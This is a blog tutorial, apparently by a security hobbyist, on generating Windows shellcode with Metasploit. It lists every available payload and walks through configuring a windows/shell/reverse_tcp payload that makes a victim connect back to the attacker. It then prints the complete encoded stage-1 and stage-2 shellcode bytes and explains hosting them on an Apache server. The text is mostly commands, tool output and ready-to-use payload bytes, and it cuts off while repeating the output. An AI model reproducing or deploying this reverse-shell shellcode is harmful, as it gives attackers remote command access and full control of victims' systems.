sweetchip's blog


Hello.


It's been a while since my last post. Haha


School started again and a lot of personal things came up, so I haven't been able to post much.. ㅠㅠ


Two months ago, while studying shellcode, I gathered a fair amount of information,


and while there are plenty of guides on using metasploit for a Remote Exploit or a Local Exploit, there are comparatively few on how to write Shellcode.


This time we will look at how to obtain Windows shellcode using Metasploit.


I will explain as simply as I can, but a little knowledge of buffer overflows and memory layout may be needed.




Prerequisites: BackTrack5 r3 [other versions work too], msfconsole [needs to be updated], apache server [optional]


Open a terminal and type msfconsole. [Loading takes about 1~2 minutes.]



msfconsole is now fully loaded.


Then type show payloads.



The shellcode that metasploit can generate is as follows.


Payloads
========

   Name  Disclosure Date  Rank  Description
   ----  ---------------  ----  -----------
   aix/ppc/shell_bind_tcp  normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port  normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact  normal  AIX execve shell for inetd
   aix/ppc/shell_reverse_tcp  normal  AIX Command Shell, Reverse TCP Inline
   bsd/sparc/shell_bind_tcp  normal  BSD Command Shell, Bind TCP Inline
   bsd/sparc/shell_reverse_tcp  normal  BSD Command Shell, Reverse TCP Inline
   bsd/x86/exec  normal  BSD Execute Command
   bsd/x86/metsvc_bind_tcp  normal  FreeBSD Meterpreter Service, Bind TCP
   bsd/x86/metsvc_reverse_tcp  normal  FreeBSD Meterpreter Service, Reverse TCP Inline
   bsd/x86/shell/bind_ipv6_tcp  normal  BSD Command Shell, Bind TCP Stager (IPv6)
   bsd/x86/shell/bind_tcp  normal  BSD Command Shell, Bind TCP Stager
   bsd/x86/shell/find_tag  normal  BSD Command Shell, Find Tag Stager
   bsd/x86/shell/reverse_ipv6_tcp  normal  BSD Command Shell, Reverse TCP Stager (IPv6)
   bsd/x86/shell/reverse_tcp  normal  BSD Command Shell, Reverse TCP Stager
   bsd/x86/shell_bind_tcp  normal  BSD Command Shell, Bind TCP Inline
   bsd/x86/shell_bind_tcp_ipv6  normal  BSD Command Shell, Bind TCP Inline (IPv6)
   bsd/x86/shell_find_port  normal  BSD Command Shell, Find Port Inline
   bsd/x86/shell_find_tag  normal  BSD Command Shell, Find Tag Inline
   bsd/x86/shell_reverse_tcp  normal  BSD Command Shell, Reverse TCP Inline
   bsd/x86/shell_reverse_tcp_ipv6  normal  BSD Command Shell, Reverse TCP Inline (IPv6)
   bsdi/x86/shell/bind_tcp  normal  BSDi Command Shell, Bind TCP Stager
   bsdi/x86/shell/reverse_tcp  normal  BSDi Command Shell, Reverse TCP Stager
   bsdi/x86/shell_bind_tcp  normal  BSDi Command Shell, Bind TCP Inline
   bsdi/x86/shell_find_port  normal  BSDi Command Shell, Find Port Inline
   bsdi/x86/shell_reverse_tcp  normal  BSDi Command Shell, Reverse TCP Inline
   cmd/unix/bind_inetd  normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_netcat  normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_ipv6  normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl  normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6  normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby  normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6  normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/generic  normal  Unix Command, Generic Command Execution
   cmd/unix/interact  normal  Unix Command, Interact with Established Connection
   cmd/unix/reverse  normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_bash  normal  Unix Command Shell, Reverse TCP (/dev/tcp)
   cmd/unix/reverse_netcat  normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_perl  normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_python  normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_ruby  normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/windows/adduser  normal  Windows Execute net user /ADD CMD
   cmd/windows/bind_perl  normal  Windows Command Shell, Bind TCP (via Perl)
   cmd/windows/bind_perl_ipv6  normal  Windows Command Shell, Bind TCP (via perl) IPv6
   cmd/windows/bind_ruby  normal  Windows Command Shell, Bind TCP (via Ruby)
   cmd/windows/download_eval_vbs  normal  Windows Executable Download and Evaluate VBS
   cmd/windows/download_exec_vbs  normal  Windows Executable Download and Execute (via .vbs)
   cmd/windows/reverse_perl  normal  Windows Command, Double reverse TCP connection (via Perl)
   cmd/windows/reverse_ruby  normal  Windows Command Shell, Reverse TCP (via Ruby)
   generic/custom  normal  Custom Payload
   generic/debug_trap  normal  Generic x86 Debug Trap
   generic/shell_bind_tcp  normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp  normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop  normal  Generic x86 Tight Loop
   java/jsp_shell_bind_tcp  normal  Java JSP Command Shell, Bind TCP Inline
   java/jsp_shell_reverse_tcp  normal  Java JSP Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp  normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http  normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https  normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp  normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp  normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp  normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp  normal  Java Command Shell, Reverse TCP Inline
   linux/armle/adduser  normal  Linux Add User
   linux/armle/exec  normal  Linux Execute Command
   linux/armle/shell_bind_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/armle/shell_reverse_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/mipsbe/shell_reverse_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/mipsle/shell_reverse_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/ppc/shell_bind_tcp  normal  Linux Command Shell, Bind TCP Inline
   linux/ppc/shell_find_port  normal  Linux Command Shell, Find Port Inline
   linux/ppc/shell_reverse_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/ppc64/shell_bind_tcp  normal  Linux Command Shell, Bind TCP Inline
   linux/ppc64/shell_find_port  normal  Linux Command Shell, Find Port Inline
   linux/ppc64/shell_reverse_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/x64/exec  normal  Linux Execute Command
   linux/x64/shell/bind_tcp  normal  Linux Command Shell, Bind TCP Stager
   linux/x64/shell/reverse_tcp  normal  Linux Command Shell, Reverse TCP Stager
   linux/x64/shell_bind_tcp  normal  Linux Command Shell, Bind TCP Inline
   linux/x64/shell_find_port  normal  Linux Command Shell, Find Port Inline
   linux/x64/shell_reverse_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/x86/adduser  normal  Linux Add User
   linux/x86/chmod  normal  Linux Chmod
   linux/x86/exec  normal  Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp  normal  Linux Meterpreter, Bind TCP Stager (IPv6)
   linux/x86/meterpreter/bind_nonx_tcp  normal  Linux Meterpreter, Bind TCP Stager
   linux/x86/meterpreter/bind_tcp  normal  Linux Meterpreter, Bind TCP Stager
   linux/x86/meterpreter/find_tag  normal  Linux Meterpreter, Find Tag Stager
   linux/x86/meterpreter/reverse_ipv6_tcp  normal  Linux Meterpreter, Reverse TCP Stager (IPv6)
   linux/x86/meterpreter/reverse_nonx_tcp  normal  Linux Meterpreter, Reverse TCP Stager
   linux/x86/meterpreter/reverse_tcp  normal  Linux Meterpreter, Reverse TCP Stager
   linux/x86/metsvc_bind_tcp  normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp  normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/read_file  normal  Linux Read File
   linux/x86/shell/bind_ipv6_tcp  normal  Linux Command Shell, Bind TCP Stager (IPv6)
   linux/x86/shell/bind_nonx_tcp  normal  Linux Command Shell, Bind TCP Stager
   linux/x86/shell/bind_tcp  normal  Linux Command Shell, Bind TCP Stager
   linux/x86/shell/find_tag  normal  Linux Command Shell, Find Tag Stager
   linux/x86/shell/reverse_ipv6_tcp  normal  Linux Command Shell, Reverse TCP Stager (IPv6)
   linux/x86/shell/reverse_nonx_tcp  normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell/reverse_tcp  normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell_bind_ipv6_tcp  normal  Linux Command Shell, Bind TCP Inline (IPv6)
   linux/x86/shell_bind_tcp  normal  Linux Command Shell, Bind TCP Inline
   linux/x86/shell_find_port  normal  Linux Command Shell, Find Port Inline
   linux/x86/shell_find_tag  normal  Linux Command Shell, Find Tag Inline
   linux/x86/shell_reverse_tcp  normal  Linux Command Shell, Reverse TCP Inline
   linux/x86/shell_reverse_tcp2  normal  Linux Command Shell, Reverse TCP Inline - Metasm Demo
   netware/shell/reverse_tcp  normal  NetWare Command Shell, Reverse TCP Stager
   osx/armle/execute/bind_tcp  normal  OS X Write and Execute Binary, Bind TCP Stager
   osx/armle/execute/reverse_tcp  normal  OS X Write and Execute Binary, Reverse TCP Stager
   osx/armle/shell/bind_tcp  normal  OS X Command Shell, Bind TCP Stager
   osx/armle/shell/reverse_tcp  normal  OS X Command Shell, Reverse TCP Stager
   osx/armle/shell_bind_tcp  normal  Apple iOS Command Shell, Bind TCP Inline
   osx/armle/shell_reverse_tcp  normal  Apple iOS Command Shell, Reverse TCP Inline
   osx/armle/vibrate  normal  Apple iOS iPhone Vibrate
   osx/ppc/shell/bind_tcp  normal  OS X Command Shell, Bind TCP Stager
   osx/ppc/shell/find_tag  normal  OS X Command Shell, Find Tag Stager
   osx/ppc/shell/reverse_tcp  normal  OS X Command Shell, Reverse TCP Stager
   osx/ppc/shell_bind_tcp  normal  OS X Command Shell, Bind TCP Inline
   osx/ppc/shell_reverse_tcp  normal  OS X Command Shell, Reverse TCP Inline
   osx/x64/dupandexecve/bind_tcp  normal  OS X dup2 Command Shell, Bind TCP Stager
   osx/x64/dupandexecve/reverse_tcp  normal  OS X dup2 Command Shell, Reverse TCP Stager
   osx/x64/exec  normal  OS X x64 Execute Command
   osx/x64/say  normal  OSX X64 say Shellcode
   osx/x64/shell_bind_tcp  normal  OS X x64 Shell Bind TCP
   osx/x64/shell_find_tag  normal  OSX Command Shell, Find Tag Inline
   osx/x64/shell_reverse_tcp  normal  OS X x64 Shell Reverse TCP
   osx/x86/bundleinject/bind_tcp  normal  Mac OS X Inject Mach-O Bundle, Bind TCP Stager
   osx/x86/bundleinject/reverse_tcp  normal  Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
   osx/x86/exec  normal  OS X Execute Command
   osx/x86/isight/bind_tcp  normal  Mac OS X x86 iSight Photo Capture, Bind TCP Stager
   osx/x86/isight/reverse_tcp  normal  Mac OS X x86 iSight Photo Capture, Reverse TCP Stager
   osx/x86/shell_bind_tcp  normal  OS X Command Shell, Bind TCP Inline
   osx/x86/shell_find_port  normal  OS X Command Shell, Find Port Inline
   osx/x86/shell_reverse_tcp  normal  OS X Command Shell, Reverse TCP Inline
   osx/x86/vforkshell/bind_tcp  normal  OS X (vfork) Command Shell, Bind TCP Stager
   osx/x86/vforkshell/reverse_tcp  normal  OS X (vfork) Command Shell, Reverse TCP Stager
   osx/x86/vforkshell_bind_tcp  normal  OS X (vfork) Command Shell, Bind TCP Inline
   osx/x86/vforkshell_reverse_tcp  normal  OS X (vfork) Command Shell, Reverse TCP Inline
   php/bind_perl  normal  PHP Command Shell, Bind TCP (via Perl)
   php/bind_perl_ipv6  normal  PHP Command Shell, Bind TCP (via perl) IPv6
   php/bind_php  normal  PHP Command Shell, Bind TCP (via PHP)
   php/bind_php_ipv6  normal  PHP Command Shell, Bind TCP (via php) IPv6
   php/download_exec  normal  PHP Executable Download and Execute
   php/exec  normal  PHP Execute Command
   php/meterpreter/bind_tcp  normal  PHP Meterpreter, Bind TCP Stager
   php/meterpreter/bind_tcp_ipv6  normal  PHP Meterpreter, Bind TCP Stager IPv6
   php/meterpreter/reverse_tcp  normal  PHP Meterpreter, PHP Reverse TCP Stager
   php/meterpreter_reverse_tcp  normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl  normal  PHP Command, Double reverse TCP connection (via Perl)
   php/reverse_php  normal  PHP Command Shell, Reverse TCP (via PHP)
   php/shell_findsock  normal  PHP Command Shell, Find Sock
   ruby/bind_tcp  normal  Ruby Command Shell, Bind TCP
   ruby/bind_tcp_ipv6  normal  Ruby Command Shell, Bind TCP IPv6
   ruby/reverse_tcp  normal  Ruby Command Shell, Reverse TCP
   solaris/sparc/shell_bind_tcp  normal  Solaris Command Shell, Bind TCP Inline
   solaris/sparc/shell_find_port  normal  Solaris Command Shell, Find Port Inline
   solaris/sparc/shell_reverse_tcp  normal  Solaris Command Shell, Reverse TCP Inline
   solaris/x86/shell_bind_tcp  normal  Solaris Command Shell, Bind TCP Inline
   solaris/x86/shell_find_port  normal  Solaris Command Shell, Find Port Inline
   solaris/x86/shell_reverse_tcp  normal  Solaris Command Shell, Reverse TCP Inline
   tty/unix/interact  normal  Unix TTY, Interact with Established Connection
   windows/adduser  normal  Windows Execute net user /ADD
   windows/dllinject/bind_ipv6_tcp  normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp  normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp  normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/find_tag  normal  Reflective DLL Injection, Find Tag Ordinal Stager
   windows/dllinject/reverse_http  normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_http  normal  Reflective DLL Injection, Reverse HTTP Stager (IPv6)
   windows/dllinject/reverse_ipv6_tcp  normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp  normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp  normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp  normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports  normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns  normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dns_txt_query_exec  normal  DNS TXT Record Payload Download and Execution
   windows/download_exec  normal  Windows Executable Download (http,https,ftp) and Execute
   windows/exec  normal  Windows Execute Command
   windows/loadlibrary  normal  Windows LoadLibrary Path
   windows/messagebox  normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/find_tag  normal  Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
   windows/meterpreter/reverse_http  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https  normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_http  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/meterpreter/reverse_ipv6_https  normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
   windows/meterpreter/reverse_ipv6_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports  normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp  normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp  normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp  normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp  normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp  normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/find_tag  normal  Windows Inject DLL, Find Tag Ordinal Stager
   windows/patchupdllinject/reverse_ipv6_tcp  normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp  normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp  normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp  normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports  normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns  normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager
   windows/patchupmeterpreter/find_tag  normal  Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports  normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp  normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp  normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp  normal  Windows Command Shell, Bind TCP Stager
   windows/shell/find_tag  normal  Windows Command Shell, Find Tag Ordinal Stager
   windows/shell/reverse_http  normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_http  normal  Windows Command Shell, Reverse HTTP Stager (IPv6)
   windows/shell/reverse_ipv6_tcp  normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp  normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp  normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp  normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns  normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp  normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw  normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp  normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned  normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp  normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp  normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp  normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/find_tag  normal  Windows Upload/Execute, Find Tag Ordinal Stager
   windows/upexec/reverse_http  normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_http  normal  Windows Upload/Execute, Reverse HTTP Stager (IPv6)
   windows/upexec/reverse_ipv6_tcp  normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp  normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp  normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp  normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns  normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp  normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp  normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp  normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/find_tag  normal  VNC Server (Reflective Injection), Find Tag Ordinal Stager
   windows/vncinject/reverse_http  normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_http  normal  VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/vncinject/reverse_ipv6_tcp  normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp  normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp  normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp  normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports  normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns  normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/x64/exec  normal  Windows x64 Execute Command
   windows/x64/loadlibrary  normal  Windows x64 LoadLibrary Path
   windows/x64/meterpreter/bind_tcp  normal  Windows x64 Meterpreter, Windows x64 Bind TCP Stager
   windows/x64/meterpreter/reverse_tcp  normal  Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
   windows/x64/shell/bind_tcp  normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
   windows/x64/shell/reverse_tcp  normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   windows/x64/shell_bind_tcp  normal  Windows x64 Command Shell, Bind TCP Inline
   windows/x64/shell_reverse_tcp  normal  Windows x64 Command Shell, Reverse TCP Inline
   windows/x64/vncinject/bind_tcp  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   windows/x64/vncinject/reverse_tcp  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager


Of these, I will generate the shellcode for windows/shell/reverse_tcp.


windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager


This is shellcode that makes the victim connect to the hacker (victim -> hacker).


Once connected, the hacker obtains the highest privileges on the system.


Type use windows/shell/reverse_tcp.





And if you want to make shellcode that runs cmd, type the following:


use windows/exec


Like this, you can pick whichever shellcode you want from the list above.


The description of each shellcode is shown on the right of the list.



Now the reverse_tcp payload is selected.


To see the payload's options, type show options.


The options are the ip and port to connect to, and exitfunc [only needed in special cases].


To use this payload, the options above must be filled in.



Now let's fill in the options.


The way to set an option is set [name] [value].


You only need to fill in the ones marked Required in the screenshot above.


exitfunc is already set, so skip it; let's fill in lhost and lport.


For host enter the ip of the server to connect back to, and for port the server's port.


ip setting

set lhost 192.168.0.2


port setting

set lport 7777



Once the settings are done, generate right away.


generate -b '\xff\x00'


The -b option runs the shellcode through an encoder so that those byte values do not appear in it.


When writing an exploit for a vulnerability, the payload is sometimes corrupted because of characters such as \xff or \x00.


Such characters are called bad chars.


The -b option is the step that keeps those bad chars from appearing.


Now everything has been generated.


The generated value is as follows.


# windows/shell/reverse_tcp - 317 bytes (stage 1)
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LHOST=192.168.0.2, LPORT=7777, 
# ReverseConnectRetries=5, ReverseAllowProxy=false, 
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf = 
"\xba\x6d\x92\x9b\x46\xdb\xd2\xd9\x74\x24\xf4\x58\x33\xc9"
"\xb1\x49\x31\x50\x14\x83\xe8\xfc\x03\x50\x10\x8f\x67\x67"
"\xae\xc6\x88\x98\x2f\xb8\x01\x7d\x1e\xea\x76\xf5\x33\x3a"
"\xfc\x5b\xb8\xb1\x50\x48\x4b\xb7\x7c\x7f\xfc\x7d\x5b\x4e"
"\xfd\xb0\x63\x1c\x3d\xd3\x1f\x5f\x12\x33\x21\x90\x67\x32"
"\x66\xcd\x88\x66\x3f\x99\x3b\x96\x34\xdf\x87\x97\x9a\x6b"
"\xb7\xef\x9f\xac\x4c\x45\xa1\xfc\xfd\xd2\xe9\xe4\x76\xbc"
"\xc9\x15\x5a\xdf\x36\x5f\xd7\x2b\xcc\x5e\x31\x62\x2d\x51"
"\x7d\x28\x10\x5d\x70\x31\x54\x5a\x6b\x44\xae\x98\x16\x5e"
"\x75\xe2\xcc\xeb\x68\x44\x86\x4b\x49\x74\x4b\x0d\x1a\x7a"
"\x20\x5a\x44\x9f\xb7\x8f\xfe\x9b\x3c\x2e\xd1\x2d\x06\x14"
"\xf5\x76\xdc\x35\xac\xd2\xb3\x4a\xae\xbb\x6c\xee\xa4\x2e"
"\x78\x88\xe6\x26\x4d\xa6\x18\xb7\xd9\xb1\x6b\x85\x46\x69"
"\xe4\xa5\x0f\xb7\xf3\xca\x25\x0f\x6b\x35\xc6\x6f\xa5\xf2"
"\x92\x3f\xdd\xd3\x9a\xd4\x1d\xdb\x4e\x7a\x4e\x73\x21\x3a"
"\x3e\x33\x91\xd2\x54\xbc\xce\xc2\x56\x16\x67\x68\xac\xf1"
"\x48\xc4\xae\x03\x21\x16\xaf\x1d\xd0\x9f\x49\x4b\x02\xc9"
"\xc2\xe4\xbb\x50\x98\x95\x44\x4f\xe4\x96\xcf\x63\x18\x58"
"\x38\x0e\x0a\x0d\xc8\x45\x70\x98\xd7\x70\x1f\x25\x42\x7e"
"\xb6\x72\xfa\x7c\xef\xb5\xa5\x7f\xda\xcd\x6c\x15\xa5\xb9"
"\x90\xf9\x25\x3a\xc7\x93\x25\x52\xbf\xc7\x75\x47\xc0\xd2"
"\xe9\xd4\x55\xdc\x5b\x88\xfe\xb4\x61\xf7\xc9\x1b\x99\xd2"
"\xcb\x60\x4c\x1b\x4e\x90\xfa\x4f\x92"

# windows/shell/reverse_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5"



OK.. everything has been generated.




The following part is optional, but I recommend doing it.


I am running this in a vm right now, so I could just move the file, but I am deliberately using the apache server.


Since it is served over the web, you can copy it simply by connecting to the BackTrack apache server~


How to start the apache2 server


In the top menu, click Applications -> BackTrack -> Services -> HTTPD -> apache start and the apache2 server starts.


The apache2 server's document folder is /var/www.


Move to /var/www.



Then open shellcode.txt with gedit.



Paste in the generated shellcode and save.



Then, when you connect to the server, shellcode.txt is visible.



I am writing it once more, but the value copied above is as follows.


msf payload(reverse_tcp) > generate -b '\xff\x00'

# windows/shell/reverse_tcp - 317 bytes (stage 1)
